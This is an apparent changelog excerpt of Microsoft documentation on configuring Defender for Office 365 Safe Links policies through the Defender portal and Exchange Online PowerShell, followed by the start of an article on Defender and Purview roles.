- > [Exceptions to Built-in protection for Safe Links](preset-security-policies.md#use-the-microsoft-defender-portal-to-add-exclusions-to-the-built-in-protection-preset-security-policy) or settings in custom Safe Links policies are ignored if a recipient is also included in the [Standard or Strict preset security policies](preset-security-policies.md). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
--- Allow up to 6 hours for a new or updated policy to be applied.--- For more information about licensing requirements, see [Licensing terms](/office365/servicedescriptions/office-365-advanced-threat-protection-service-description#licensing-terms).-
-## Use the Microsoft Defender portal to create Safe Links policies
-
-1. In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Safe Links** in the **Policies** section. Or, to go directly to the **Safe Links** page, use <https://security.microsoft.com/safelinksv2>.
-
-2. On the **Safe Links** page, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Create** to start the new Safe Links policy wizard.
-
-3. On the **Name your policy** page, configure the following settings:
-
- - **Name**: Enter a unique, descriptive name for the policy.
- - **Description**: Enter an optional description for the policy.
-
- When you're finished on the **Name your policy** page, select **Next**.
-
-4. On the **Users and domains** page, identify the internal recipients that the policy applies to (recipient conditions):
- - **Users**: The specified mailboxes, mail users, or mail contacts.
- - **Groups**:
- - Members of the specified distribution groups (including non-mail-enabled security groups within distribution groups) or mail-enabled security groups (dynamic distribution groups aren't supported).
- - The specified Microsoft 365 Groups.
- - **Domains**: All recipients in the organization with a primary email address in the specified [accepted domain](/exchange/mail-flow-best-practices/manage-accepted-domains/manage-accepted-domains).
-
- Click in the appropriate box, start typing a value, and select the value that you want from the results. Repeat this process as many times as necessary. To remove an existing value, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png"::: next to the value.
-
- For users or groups, you can use most identifiers (name, display name, alias, email address, account name, etc.), but the corresponding display name is shown in the results. For users, enter an asterisk (\*) by itself to see all available values.
-
- You can use a condition only once, but the condition can contain multiple values:
-
- - Multiple **values** of the **same condition** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy is applied to them.
- - Different **types of conditions** use AND logic. The recipient must match **all** of the specified conditions for the policy to apply to them. For example, you configure a condition with the following values:
- - Users: `romain@contoso.com`
- - Groups: Executives
-
- The policy is applied to `romain@contoso.com` _only_ if he's also a member of the Executives group. Otherwise, the policy isn't applied to him.
-
- - **Exclude these users, groups, and domains**: To add exceptions for the internal recipients that the policy applies to (recipient exceptions), select this option and configure the exceptions. The settings and behavior are exactly like the conditions.
-
- You can use an exception only once, but the exception can contain multiple values:
-
- - Multiple **values** of the **same exception** use OR logic (for example, _\<recipient1\>_ or _\<recipient2\>_). If the recipient matches **any** of the specified values, the policy isn't applied to them.
- - Different **types of exceptions** use OR logic (for example, _\<recipient1\>_ or _\<member of group1\>_ or _\<member of domain1\>_). If the recipient matches **any** of the specified exception values, the policy isn't applied to them.
-
- When you're finished on the **Users and domains** page, select **Next**.
-
-5. On the **URL & click protection settings** page, configure the following settings:
-
- - **Email** section:
- - **On: Safe Links checks a list of known, malicious links when users click links in email. URLs are rewritten by default**: Select this option to turn on Safe Links protection for links in email messages (URL rewriting and time of click protection). If you select this option, the following settings are available:
- - **Apply Safe Links to email messages sent within the organization**: Select this option to apply the Safe Links policy to messages between internal senders and internal recipients. Turning on this setting enables link wrapping for all intra-organization messages.
- - **Apply real-time URL scanning for suspicious links and links that point to files**: Select this option to turn on real-time scanning of links in email messages from external senders. If you select this option, the following setting is available:
- - **Wait for URL scanning to complete before delivering the message**: Select this option to wait for real-time URL scanning to complete before delivering the message from external senders. The recommended setting is **On**.
- - **Do not rewrite URLs, do checks via SafeLinks API only**: Select this option to prevent URL wrapping and skip reputation check during mail flow. Safe Links is called exclusively via APIs at the time of URL click by Outlook clients that support it.
-
- - **Do not rewrite the following URLs in email** section: Select the **Manage (nn) URLs** link to allow access to specific URLs that would otherwise be blocked by Safe Links.
-
- > [!NOTE]
- > Entries in the "Do not rewrite the following URLs" list aren't scanned or wrapped by Safe Links during mail flow, but might still be blocked at time of click. Report the URL as **Should not have been blocked (False positive)** and select **Alow this URL** to add an allow entry to the Tenant Allow/Block List so the URL isn't scanned or wrapped by Safe Links during mail flow _and_ at time of click. For instructions, see [Report good URLs to Microsoft](submissions-admin.md#report-good-urls-to-microsoft).
-
- 1. In the **Manage URLs to not rewrite** flyout that opens, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add URLs**.
- 2. In the **Add URLs** flyout that opens, click in the **URL** box, enter a value, and then press the ENTER key or select the complete value that's displayed below the box. Repeat this step as many times as necessary.
-
- For URL syntax, see [Entry syntax for the "Do not rewrite the following URLs" list](safe-links-about.md#entry-syntax-for-the-do-not-rewrite-the-following-urls-list).
-
- To remove an entry, select :::image type="icon" source="../../media/m365-cc-sc-remove-selection-icon.png" border="false"::: next to the entry.
-
- When you're finished on the **Add URLs** flyout, select **Save**.
-
- 3. Back on the **Manage URLs to not rewrite** flyout, the URL entries that you added are listed on the flyout.
-
- To change the list of URLs from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
- Use the :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Search** box to find entries on the flyout.
-
- To add entries, select :::image type="icon" source="../../media/m365-cc-sc-create-icon.png" border="false"::: **Add URLs** and repeat the previous step.
-
- To remove entries, do either of the following steps:
-
- - Select one or more entries by selecting the round check box that appears in the blank area next to the URL value.
- - Select all entries at once by selecting the round check box that appears in the blank area next to the **URLs** column header.
-
- With one or more entries selected, select the :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete** action that appears.
-
- When you're finished on the **Manage URLs to not rewrite** flyout, select **Done** to return to the **URL & click protection settings** page.
-
- - **Teams** section:
- - **On: Safe Links checks a list of known, malicious links when users click links in Microsoft Teams. URLs are not rewritten.**: Select this option to enable Safe Links protection for links in Teams. This setting might take up to 24 hours to take effect. This setting affects time of click protection.
-
- - **Office 365 apps** section:
- - **On: Safe Links checks a list of known, malicious links when users click links in Microsoft Office apps. URLs are not rewritten.**: Select this option to enable Safe Links protection for links in files in supported Office desktop, mobile, and web apps. This setting affects time of click protection.
-
- - **Click protection settings** section:
- - **Track user clicks**: Leave this option selected to enable the tracking user clicks on URLs. If you select this option, the following options are available:
- - **Let users click through to the original URL**: Clear this option to block users from clicking through to the original URL in [warning pages](safe-links-about.md#warning-pages-from-safe-links).
- - **Display the organization branding on notification and warning pages**: For more information about customized branding, see [Customize the Microsoft 365 theme for your organization](/microsoft-365/admin/setup/customize-your-organization-theme).
-
- For detailed information about these settings, see:
-
- - [Safe Links settings for email messages](safe-links-about.md#safe-links-settings-for-email-messages).
- - [Safe Links settings for Microsoft Teams](safe-links-about.md#safe-links-settings-for-microsoft-teams).
- - [Safe Links settings for Office apps](safe-links-about.md#safe-links-settings-for-office-apps).
- - [Click protection settings in Safe Links policies](safe-links-about.md#click-protection-settings-in-safe-links-policies)
-
- For more the recommended values for Standard and Strict policy settings, see [Safe Links policy settings](recommended-settings-for-eop-and-office365.md#safe-links-policy-settings).
-
- When you're finished on the **URL & click protection settings** page, select **Next**.
-
-6. On the **Notification** page, select one of the following values for **How would you like to notify your users?**:
- - **Use the default notification text**
- - **Use custom notification text**: If you select this value, the following settings appear:
- - **Use Microsoft Translator for automatic localization**
- - **Custom notification text**: Enter the custom notification text in this box (the length can't exceed 200 characters).
-
- When you're finished on the **Notification** page, select **Next**.
-
-7. On the **Review** page, review your settings. You can select **Edit** in each section to modify the settings within the section. Or you can select **Back** or the specific page in the wizard.
-
- When you're finished on the **Review** page, select **Submit**.
-
-8. On the **New Safe Links policy created** page, you can select the links to view the policy, view Safe Links policies, and learn more about Safe Links policies.
-
- When you're finished on the **New Safe Links policy created** page, select **Done**.
-
- Back on the **Safe Links** page, the new policy is listed.
-
-## Use the Microsoft Defender portal to view Safe Links policy details
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Safe Links** in the **Policies** section. To go directly to the **Safe Links** page, use <https://security.microsoft.com/safelinksv2>.
-
-On the **Safe Links** page, the following properties are displayed in the list of policies:
--- **Name**-- **Status**: Values are **On** or **Off**.-- **Priority**: For more information, see the [Set the priority of Safe Links policies](#use-the-microsoft-defender-portal-to-set-the-priority-of-custom-safe-links-policies) section.-
-To change the list of policies from normal to compact spacing, select :::image type="icon" source="../../media/m365-cc-sc-standard-icon.png" border="false"::: **Change list spacing to compact or normal**, and then select :::image type="icon" source="../../media/m365-cc-sc-compact-icon.png" border="false"::: **Compact list**.
-
-Use the :::image type="icon" source="../../media/m365-cc-sc-search-icon.png" border="false"::: **Search** box and a corresponding value to find specific Safe Links policies.
-
-Use :::image type="icon" source="../../media/m365-cc-sc-download-icon.png" border="false"::: **Export** to export the list of policies to a CSV file.
-
-Use :::image type="icon" source="../../medi#threat-protection-status-report).
-
-Select a policy by clicking anywhere in the row other than the check box next to the name to open the details flyout for the policy.
-
-> [!TIP]
-> To see details about other Safe Links policies without leaving the details flyout, use :::image type="icon" source="../../media/updownarrows.png" border="false"::: **Previous item** and **Next item** at the top of the flyout.
-
-## Use the Microsoft Defender portal to take action on Safe Links policies
-
-In the Microsoft Defender portal at <https://security.microsoft.com>, go to **Email & Collaboration** \> **Policies & Rules** \> **Threat policies** \> **Safe Links** in the **Policies** section. To go directly to the **Safe Links** page, use <https://security.microsoft.com/safealinksv2>.
-
-2. On the **Safe Links** page, select the Safe Links policy by using either of the following methods:
-
- - Select the policy from the list by selecting the check box next to the name. The following actions are available in the :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** dropdown list that appears:
- - **Enable selected policies**.
- - **Disable selected policies**.
- - **Delete selected policies**.
-
- :::image type="content" source="../../media/safe-links-policies-main-page.png" alt-text="The Safe Links page with a policy selected and the More actions control expanded." lightbox="../../media/safe-links-policies-main-page.png":::
-
- - Select the policy from the list by clicking anywhere in the row other than the check box next to the name. Some or all following actions are available in the details flyout that opens:
- - Modify policy settings by clicking **Edit** in each section (custom policies or the default policy)
- - :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** or :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** (custom policies only)
- - :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** or :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** (custom policies only)
- - :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** (custom policies only)
-
- :::image type="content" source="../../media/anti-phishing-policies-details-flyout.png" alt-text="The details flyout of a custom Safe Links policy." lightbox="../../media/anti-phishing-policies-details-flyout.png":::
-
-The actions are described in the following subsections.
-
-### Use the Microsoft Defender portal to modify custom Safe Links policies
-
-After you select a custom Safe Links policy by clicking anywhere in the row other than the check box next to the name, the policy settings are shown in the details flyout that opens. Select **Edit** in each section to modify the settings within the section. For more information about the settings, see the [Create Safe Links policies](#use-the-microsoft-defender-portal-to-create-safe-links-policies) section earlier in this article.
-
-You can't modify the Safe Links policies named **Standard Preset Security Policy**, **Strict Preset Security Policy**, or **Built-in protection (Microsoft)** that are associated with [preset security policies](preset-security-policies.md) in the policy details flyout. Instead, you select :::image type="icon" source="../../media/m365-cc-sc-open-icon.png" border="false"::: **View preset security policies** in the details flyout to go to the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies> to modify the preset security policies.
-
-### Use the Microsoft Defender portal to enable or disable custom Safe Links policies
-
-You can't enable or disable the Safe Links policies named **Standard Preset Security Policy**, **Strict Preset Security Policy**, or **Built-in protection (Microsoft)** that are associated with [preset security policies](preset-security-policies.md) here. You enable or disable preset security policies on the **Preset security policies** page at <https://security.microsoft.com/presetSecurityPolicies>.
-
-After you select an enabled custom Safe Links policy (the **Status** value is **On**), use either of the following methods to disable it:
--- **On the Safe Links page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Disable selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn off** at the top of the flyout.-
-After you select a disabled custom Safe Links policy (the **Status** value is **Off**), use either of the following methods to enable it:
--- **On the Safe Links page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Enable selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-turn-on-off-icon.png" border="false"::: **Turn on** at the top of the flyout.-
-On the **Safe Links** page, the **Status** value of the policy is now **On** or **Off**.
-
-### Use the Microsoft Defender portal to set the priority of custom Safe Links policies
-
-Safe Links policies are processed in the order that they're displayed on the **Safe Links** page:
--- The Safe Links policy named **Strict Preset Security Policy** that's associated with the Strict preset security policy is always applied first (if the Strict preset security policy is [enabled](preset-security-policies.md#use-the-microsoft-defender-portal-to-assign-standard-and-strict-preset-security-policies-to-users)).-- The Safe Links policy named **Standard Preset Security Policy** that's associated with the Standard preset security policy is always applied next (if the Standard preset security policy is enabled).-- Custom Safe Links policies are applied next in priority order (if they're enabled):
- - A lower priority value indicates a higher priority (0 is the highest).
- - By default, a new policy is created with a priority that's lower than the lowest existing custom policy (the first is 0, the next is 1, etc.).
- - No two policies can have the same priority value.
-- The Safe Links policy named **Built-in protection (Microsoft)** that's associated with Built-in protection always has the priority value **Lowest**, and you can't change it.-
-Safe Links protection stops for a recipient after the first policy is applied (the highest priority policy for that recipient). For more information, see [Order and precedence of email protection](how-policies-and-protections-are-combined.md).
-
-After you select the custom Safe Links policy by clicking anywhere in the row other than the check box next to the name, you can increase or decrease the priority of the policy in the details flyout that opens:
--- The custom policy with the **Priority** value **0** on the **Safe Links** page has the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** action at the top of the details flyout.-- The custom policy with the lowest priority (highest **Priority** value; for example, **3**) has the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** action at the top of the details flyout.-- If you have three or more policies, the policies between **Priority** 0 and the lowest priority have both the :::image type="icon" source="../../media/m365-cc-sc-increase-icon.png" border="false"::: **Increase priority** and the :::image type="icon" source="../../media/m365-cc-sc-decrease-icon.png" border="false"::: **Decrease priority** actions at the top of the details flyout.-
-When you're finished in the policy details flyout, select **Close**.
-
-Back on the **Safe Links** page, the order of the policy in the list matches the updated **Priority** value.
-
-### Use the Microsoft Defender portal to remove custom Safe Links policies
-
-You can't remove the Safe Links policies named **Standard Preset Security Policy**, **Strict Preset Security Policy**, or **Built-in protection (Microsoft)** that are associated with [preset security policies](preset-security-policies.md).
-
-After you select the custom Safe Links policy, use either of the following methods to remove it:
--- **On the Safe Links page**: Select :::image type="icon" source="../../media/m365-cc-sc-more-actions-icon.png" border="false"::: **More actions** \> **Delete selected policies**.-- **In the details flyout of the policy**: Select :::image type="icon" source="../../media/m365-cc-sc-delete-icon.png" border="false"::: **Delete policy** at the top of the flyout.-
-Select **Yes** in the warning dialog that opens.
-
-Back on the **Safe Links** page, the removed policy is no longer listed.
-
-## Use Exchange Online PowerShell to configure Safe Links policies
-
-In PowerShell, the basic elements of a Safe Links policy are:
--- **The safe links policy**: Turns on Safe Links protection, turns on real-time URL scanning, specifies whether to wait for real-time scanning to complete before delivering the message, turns on scanning for internal messages, specifies whether to track user clicks on URLs, and specifies whether to allow users to click through to the original URL.-- **The safe links rule**: Specifies the priority and recipient filters (who the policy applies to).-
-The difference between these two elements isn't obvious when you manage Safe Links policies in the Microsoft Defender portal:
--- When you create a Safe Links policy in the Defender portal, you're actually creating a safe links rule and the associated safe links policy at the same time using the same name for both.-- When you modify a Safe Links policy in the Defender portal, settings related to the name, priority, enabled or disabled, and recipient filters modify the safe links rule. All other settings modify the associated safe links policy.-- When you remove a Safe Links policy in the Defender portal, the safe links rule and the associated safe links policy are removed.-
-In PowerShell, the difference between safe links policies and safe links rules is apparent. You manage safe links policies by using the **\*-SafeLinksPolicy** cmdlets, and you manage safe links rules by using the **\*-SafeLinksRule** cmdlets.
--- In PowerShell, you create the safe links policy first, then you create the safe links rule that identifies the policy that the rule applies to.-- In PowerShell, you modify the settings in the safe links policy and the safe links rule separately.-- When you remove a safe links policy from PowerShell, the corresponding safe links rule isn't automatically removed, and vice versa.-
-### Use PowerShell to create Safe Links policies
-
-Creating a Safe Links policy in PowerShell is a two-step process:
-
-1. Create the safe links policy.
-2. Create the safe links rule that specifies the safe links policy that the rule applies to.
-
-> [!NOTE]
->
-> - You can create a new safe links rule and assign an existing, unassociated safe links policy to it. A safe links rule can't be associated with more than one safe links policy.
->
-> - You can configure the following settings on new safe links policies in PowerShell that aren't available in the Microsoft Defender portal until after you create the policy:
-> - Create the new policy as disabled (_Enabled_ `$false` on the **New-SafeLinksRule** cmdlet).
-> - Set the priority of the policy during creation (_Priority_ _\<Number\>_) on the **New-SafeLinksRule** cmdlet).
->
-> - A new safe links policy that you create in PowerShell isn't visible in the Microsoft Defender portal until you assign the policy to a safe links rule.
-
-#### Step 1: Use PowerShell to create a safe links policy
-
-To create a safe links policy, use this syntax:
-
-```PowerShell
-New-SafeLinksPolicy -Name "<PolicyName>" [-AdminDisplayName "<Comments>"] [-EnableSafeLinksForEmail <$true | $false>] [-EnableSafeLinksForOffice <$true | $false>] [-EnableSafeLinksForTeams <$true | $false>] [-ScanUrls <$true | $false>] [-DeliverMessageAfterScan <$true | $false>] [-EnableForInternalSenders <$true | $false>] [-AllowClickThrough <$true | $false>] [-TrackUserClicks <$true | $false>] [-DoNotRewriteUrls "Entry1","Entry2",..."EntryN"]
-```
-
-> [!NOTE]
->
-> - For details about the entry syntax to use for the _DoNotRewriteUrls_ parameter, see [Entry syntax for the "Do not rewrite the following URLs" list](safe-links-about.md#entry-syntax-for-the-do-not-rewrite-the-following-urls-list).
->
-> - For additional syntax that you can use for the _DoNotRewriteUrls_ parameter when you modify existing safe links policies by using the **Set-SafeLinksPolicy** cmdlet, see the [Use PowerShell to modify safe links policies](#use-powershell-to-modify-safe-links-policies) section later in this article.
-
-This example creates a safe links policy named Contoso All with the following values:
--- Turn on URL scanning and URL rewriting in email messages.
- - Turn on URL scanning and rewriting for internal messages.
- - Turn on real-time scanning of clicked URLs, including clicked links that point to files.
- - Wait for URL scanning to complete before delivering the message.
-- Turn on URL scanning in Teams.-- Turn on URL scanning in supported Office apps.-- Track user clicks related to Safe Links protection (we aren't using the _TrackUserClicks_ parameter, and the default value is $true).-- Do not allow users to click through to the original URL.-
-```PowerShell
-New-SafeLinksPolicy -Name "Contoso All" -EnableSafeLinksForEmail $true -EnableSafeLinksForOffice $true -EnableSafeLinksForTeams $true -ScanUrls $true -DeliverMessageAfterScan $true -EnableForInternalSenders $true -AllowClickThrough $false
-```
-
-For detailed syntax and parameter information, see [New-SafeLinksPolicy](/powershell/module/exchange/new-safelinkspolicy).
-
-#### Step 2: Use PowerShell to create a safe links rule
-
-To create a safe links rule, use this syntax:
-
-```PowerShell
-New-SafeLinksRule -Name "<RuleName>" -SafeLinksPolicy "<PolicyName>" <Recipient filters> [<Recipient filter exceptions>] [-Comments "<OptionalComments>"] [-Enabled <$true | $false>]
-```
-
-This example creates a safe links rule named Contoso All with the following conditions:
--- The rule is associated with the safe links policy named Contoso All.-- The rule applies to all recipients in the contoso.com domain.-- Because we aren't using the _Priority_ parameter, the default priority is used.-- The rule is enabled (we aren't using the _Enabled_ parameter, and the default value is `$true`).-
-```powershell
-New-SafeLinksRule -Name "Contoso All" -SafeLinksPolicy "Contoso All" -RecipientDomainIs contoso.com
-```
-
-This example creates a safe links rule that's similar to the previous example, but in this example, the rule applies to recipients in all accepted domains in the organization.
-
-```powershell
-New-SafeLinksRule -Name "Contoso All" -SafeLinksPolicy "Contoso All" -RecipientDomainIs (Get-AcceptedDomain).Name
-```
-
-This example creates a safe links rule that's similar to the previous examples, but in this example, the rule applies to recipients in the domains specified in a .csv file.
-
-```powershell
-$Data = Import-Csv -Path "C:\Data\SafeLinksDomains.csv"
-$SLDomains = $Data.Domains
-New-SafeLinksRule -Name "Contoso All" -SafeLinksPolicy "Contoso All" -RecipientDomainIs $SLDomains
-```
-
-For detailed syntax and parameter information, see [New-SafeLinksRule](/powershell/module/exchange/new-safelinksrule).
-
-### Use PowerShell to view safe links policies
-
-To view existing safe links policies, use the following syntax:
-
-```PowerShell
-Get-SafeLinksPolicy [-Identity "<PolicyIdentity>"] [| <Format-Table | Format-List> <Property1,Property2,...>]
-```
-
-This example returns a summary list of all safe links policies.
-
-```PowerShell
-Get-SafeLinksPolicy | Format-Table Name
-```
-
-This example returns detailed information for the safe links policy named Contoso Executives.
-
-```PowerShell
-Get-SafeLinksPolicy -Identity "Contoso Executives"
-```
-
-For detailed syntax and parameter information, see [Get-SafeLinksPolicy](/powershell/module/exchange/get-safelinkspolicy).
-
-### Use PowerShell to view safe links rules
-
-To view existing safe links rules, use the following syntax:
-
-```PowerShell
-Get-SafeLinksRule [-Identity "<RuleIdentity>"] [-State <Enabled | Disabled] [| <Format-Table | Format-List> <Property1,Property2,...>]
-```
-
-This example returns a summary list of all safe links rules.
-
-```PowerShell
-Get-SafeLinksRule | Format-Table Name,State
-```
-
-To filter the list by enabled or disabled rules, run the following commands:
-
-```PowerShell
-Get-SafeLinksRule -State Disabled
-```
-
-```PowerShell
-Get-SafeLinksRule -State Enabled
-```
-
-This example returns detailed information for the safe links rule named Contoso Executives.
-
-```PowerShell
-Get-SafeLinksRule -Identity "Contoso Executives"
-```
-
-For detailed syntax and parameter information, see [Get-SafeLinksRule](/powershell/module/exchange/get-safelinksrule).
-
-### Use PowerShell to modify safe links policies
-
-You can't rename a safe links policy in PowerShell (the **Set-SafeLinksPolicy** cmdlet has no _Name_ parameter). When you rename a Safe Links policy in the Microsoft Defender portal, you're only renaming the safe links _rule_.
-
-The only additional consideration for modifying safe links policies in PowerShell is the available syntax for the _DoNotRewriteUrls_ parameter (the ["Do not rewrite the following URLs" list](safe-links-about.md#do-not-rewrite-the-following-urls-lists-in-safe-links-policies)):
--- To add values that will replace any existing entries, use the following syntax: `"Entry1","Entry2,..."EntryN"`.-- To add or remove values without affecting other existing entries, use the following syntax: `@{Add="Entry1","Entry2"...; Remove="Entry3","Entry4"...}`-
-Otherwise, the same settings are available when you create a safe links policy as described in the [Step 1: Use PowerShell to create a safe links policy](#step-1-use-powershell-to-create-a-safe-links-policy) section earlier in this article.
-
-To modify a safe links policy, use this syntax:
-
-```PowerShell
-Set-SafeLinksPolicy -Identity "<PolicyName>" <Settings>
-```
-
-For detailed syntax and parameter information, see [Set-SafeLinksPolicy](/powershell/module/exchange/set-safelinkspolicy).
-
-### Use PowerShell to modify safe links rules
-
-The only setting that's not available when you modify a safe links rule in PowerShell is the _Enabled_ parameter that allows you to create a disabled rule. To enable or disable existing safe links rules, see the next section.
-
-Otherwise, the same settings are available when you create a rule as described in the [Step 2: Use PowerShell to create a safe links rule](#step-2-use-powershell-to-create-a-safe-links-rule) section earlier in this article.
-
-To modify a safe links rule, use this syntax:
-
-```PowerShell
-Set-SafeLinksRule -Identity "<RuleName>" <Settings>
-```
-
-This example adds all accepted domains in the organization as a condition to the safe links rule named Contoso All.
-
-```powershell
-Set-SafeLinksRule -Identity "Contoso All" -RecipientDomainIs (Get-AcceptedDomain).Name
-```
-
-This example adds the domains from the specified .csv as a condition to the safe links rule named Contoso All.
-
-```powershell
-$Data = Import-Csv -Path "C:\Data\SafeLinksDomains.csv"
-$SLDomains = $Data.Domains
-Set-SafeLinksRule -Identity "Contoso All" -RecipientDomainIs $SLDomains
-```
-
-For detailed syntax and parameter information, see [Set-SafeLinksRule](/powershell/module/exchange/set-safelinksrule).
-
-### Use PowerShell to enable or disable safe links rules
-
-Enabling or disabling a safe links rule in PowerShell enables or disables the whole Safe Links policy (the safe links rule and the assigned safe links policy).
-
-To enable or disable a safe links rule in PowerShell, use this syntax:
-
-```PowerShell
-<Enable-SafeLinksRule | Disable-SafeLinksRule> -Identity "<RuleName>"
-```
-
-This example disables the safe links rule named Marketing Department.
-
-```PowerShell
-Disable-SafeLinksRule -Identity "Marketing Department"
-```
-
-This example enables same rule.
-
-```PowerShell
-Enable-SafeLinksRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Enable-SafeLinksRule](/powershell/module/exchange/enable-safelinksrule) and [Disable-SafeLinksRule](/powershell/module/exchange/disable-safelinksrule).
-
-### Use PowerShell to set the priority of safe links rules
-
-The highest priority value you can set on a rule is 0. The lowest value you can set depends on the number of rules. For example, if you have five rules, you can use the priority values 0 through 4. Changing the priority of an existing rule can have a cascading effect on other rules. For example, if you have five custom rules (priorities 0 through 4), and you change the priority of a rule to 2, the existing rule with priority 2 is changed to priority 3, and the rule with priority 3 is changed to priority 4.
-
-To set the priority of a safe links rule in PowerShell, use the following syntax:
-
-```PowerShell
-Set-SafeLinksRule -Identity "<RuleName>" -Priority <Number>
-```
-
-This example sets the priority of the rule named Marketing Department to 2. All existing rules that have a priority less than or equal to 2 are decreased by 1 (their priority numbers are increased by 1).
-
-```PowerShell
-Set-SafeLinksRule -Identity "Marketing Department" -Priority 2
-```
-
-> [!NOTE]
-> To set the priority of a new rule when you create it, use the _Priority_ parameter on the **New-SafeLinksRule** cmdlet instead.
-
-For detailed syntax and parameter information, see [Set-SafeLinksRule](/powershell/module/exchange/set-safelinksrule).
-
-### Use PowerShell to remove safe links policies
-
-When you use PowerShell to remove a safe links policy, the corresponding safe links rule isn't removed.
-
-To remove a safe links policy in PowerShell, use this syntax:
-
-```PowerShell
-Remove-SafeLinksPolicy -Identity "<PolicyName>"
-```
-
-This example removes the safe links policy named Marketing Department.
-
-```PowerShell
-Remove-SafeLinksPolicy -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-SafeLinksPolicy](/powershell/module/exchange/remove-safelinkspolicy).
-
-### Use PowerShell to remove safe links rules
-
-When you use PowerShell to remove a safe links rule, the corresponding safe links policy isn't removed.
-
-To remove a safe links rule in PowerShell, use this syntax:
-
-```PowerShell
-Remove-SafeLinksRule -Identity "<PolicyName>"
-```
-
-This example removes the safe links rule named Marketing Department.
-
-```PowerShell
-Remove-SafeLinksRule -Identity "Marketing Department"
-```
-
-For detailed syntax and parameter information, see [Remove-SafeLinksRule](/powershell/module/exchange/remove-safelinksrule).
-
-To verify that Safe Links is scanning messages, check the available Microsoft Defender for Office 365 reports. For more information, see [View reports for Defender for Office 365](reports-defender-for-office-365.md) and [Use Explorer in the Microsoft Defender portal](threat-explorer-real-time-detections-about.md).
-
-## How do you know these procedures worked?
-
-To verify that you've successfully created, modified, or removed Safe Links policies, do any of the following steps:
--- On the **Safe Links** page in the Microsoft Defender portal at <https://security.microsoft.com/safelinksv2>, verify the list of policies, their **Status** values, and their **Priority** values. To view more details, select the policy from the list, and view the details in the fly out.--- In Exchange Online PowerShell or Exchange Online Protection PowerShell, replace \<Name\> with the name of the policy or rule, run the following command, and verify the settings:-
- ```PowerShell
- Get-SafeLinksPolicy -Identity "<Name>"
- ```
-
- ```PowerShell
- Get-SafeLinksRule -Identity "<Name>"
- ```
--- Use the URL `http://spamlink.contoso.com` to test Safe Links protection. This URL is similar to the GTUBE text string for testing anti-spam solutions. This URL isn't harmful, but it triggers a Safe Links protection response.
security Scc Permissions https://github.com/MicrosoftDocs/microsoft-365-docs/commits/public/microsoft-365/security/office-365-security/scc-permissions.md
- Title: Roles and role groups in Microsoft Defender for Office 365 and Microsoft Purview
- - NOCSH
----
- - 'ms.o365.cc.AdminRoleGroups'
--- m365-security-- tier1
- - MOE150
- - MET150
-description: Admins can learn about the roles and role groups in Microsoft Defender for Office 365 and Microsoft Purview.
--- seo-marvel-apr2020- Previously updated : 04/18/2024--
-# Roles and role groups in Microsoft Defender for Office 365 and Microsoft Purview
--
-The [Microsoft Defender portal](../defender/microsoft-365-defender-portal.md), [Microsoft Purview portal](/purview/purview-portal), and the classic Microsoft Purview [compliance](/purview/microsoft-365-compliance-center) and [governance](/purview/use-microsoft-purview-governance-portal) portals have replaced the Security & Compliance Center as the places to manage Microsoft Defender for Office 365 and Microsoft Purview roles and role groups for your organization. For more information about permissions within these portals, see the following articles:
--- [Email & collaboration permissions in the Microsoft Defender portal](mdo-portal-permissions.md)-- [Permissions in the Microsoft Purview portal](/purview/purview-portal)-- [Permissions in the Microsoft Purview compliance portal](/purview/microsoft-365-compliance-center-permissions)-- [Permissions in the Microsoft Purview governance portal](/purview/roles-permissions)-
-These portals let you grant permissions to people who perform tasks like device management, data loss prevention, eDiscovery, retention, and so on. These people can perform only the tasks that you explicitly grant them access to. To access these portals, users need to be a global admin or a member of one or more role groups in Defender for Office 365 (**Email & collaboration** role groups) or Purview (**Microsoft Purview solutions** role groups). The [Microsoft Purview portal (preview)](/purview/purview-portal) provides access to data governance, data security, and risk and compliance solutions. Selecting risk and compliance solutions in the portal currently opens these solutions in the classic [Microsoft Purview compliance portal](https://compliance.microsoft.com).
-
-Permissions in these portals are based on the role-based access control (RBAC) permissions model. RBAC is the same permissions model that's used by Exchange, so if you're familiar with Exchange Online, granting permissions in these portals is very similar. But, It's important to remember that role groups in Exchange Online and role groups for Defender for Office 365 or Purview compliance don't share membership or permissions. For example, while an Organization Management role group exists in Exchange Online, the permissions granted and role group members are different than the Organization Management role group in Defender for Office 365 and Purview compliance.
-
-This article contains the inventory of Defender for Office 365 and Microsoft Purview roles and role groups.
-
-> [!NOTE]
